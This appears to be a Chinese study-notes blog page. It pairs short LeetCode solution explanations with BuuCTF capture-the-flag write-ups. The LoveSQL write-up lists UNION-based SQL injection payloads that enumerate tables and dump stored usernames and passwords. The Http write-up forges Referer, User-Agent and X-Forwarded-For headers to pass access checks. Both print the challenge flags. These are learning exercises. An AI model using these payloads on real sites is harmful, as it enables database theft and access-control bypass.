LeetCode
加一
当对数组 digits 加一时,只需要关注 digits 的末尾出现了多少个 999 即可。可以考虑如下的三种情况:
如果 digits 的末尾没有 999,例如 [1,2,3],那么直接将末尾的数加一,得到 [1,2,4] 并返回;
如果 digits 的末尾有若干个 999,例如 [1,2,3,9,9],那么只需要找出从末尾开始的第一个不为 999 的元素,即 333,将该元素加一,得到 [1,2,4,9,9]。随后将末尾的 999 全部置零,得到 [1,2,4,0,0] 并返回。
如果 digits 的所有元素都是 999,例如 [9,9,9,9,9],那么答案为 [1,0,0,0,0,0]。只需要构造一个长度比 digits 多 111 的新数组,将首元素置为 111,其余元素置为 000 即可。
1 | class Solution { |
验证回文串
最简单的方法是对字符串 s 进行一次遍历,并将其中的字母和数字字符进行保留,放在另一个字符串中。这样只需要判断是否是一个普通的回文串即可。
1 | class Solution { |
只出现一次的数字
定义数组,数字n出现一次,v[n]加一,最终v[n]为1的话就说明n只出现了一次。
1 | class Solution { |
BuuCTF
10、LoveSQL
尝试万能密码
有显示
尝试联合查询,查到3的时候回显正常
爆数据库password=:1' union select 1,2,database()#
爆出数据库名为geek
爆表名password=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1#
爆出表名为geekuser
爆表名password=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1#
爆出表名为l0ve1ysq1
爆列名password=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
id,username,password
爆数据:/check.php?username=1&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23
查看源代码,得到flag
1 | flag{7904eee7-45b3-4f8b-8eac-ecab975dac71} |
11、Http
查看页面源代码,发现有个Secret.php文件
查看该文件,有一个网址
提示:It doesn’t come from ‘https://www.Sycsecret.com’,就是说这个页面得来自https://www.Sycsecret.com,添加referer即可
1 | Referer头用于告诉web服务器,用户是从哪个页面找过来的 |
添加Referer:https://www.Sycsecret.com
,send,提示Please use “Syclover” browser:请使用“Syclover”浏览器
1 | User-Agent头用于告诉web服务器用户使用的浏览器和操作系统信息 |
添加User-Agent:Syclover
,send,提示No!!! you can only read this locally!!!:不! !您只能在本地阅读!!
添加X-Forwarded-For:127.0.0.1
,send,得到flag
1 | flag{43a4b431-f334-44b4-bcb3-aadf626871ac} |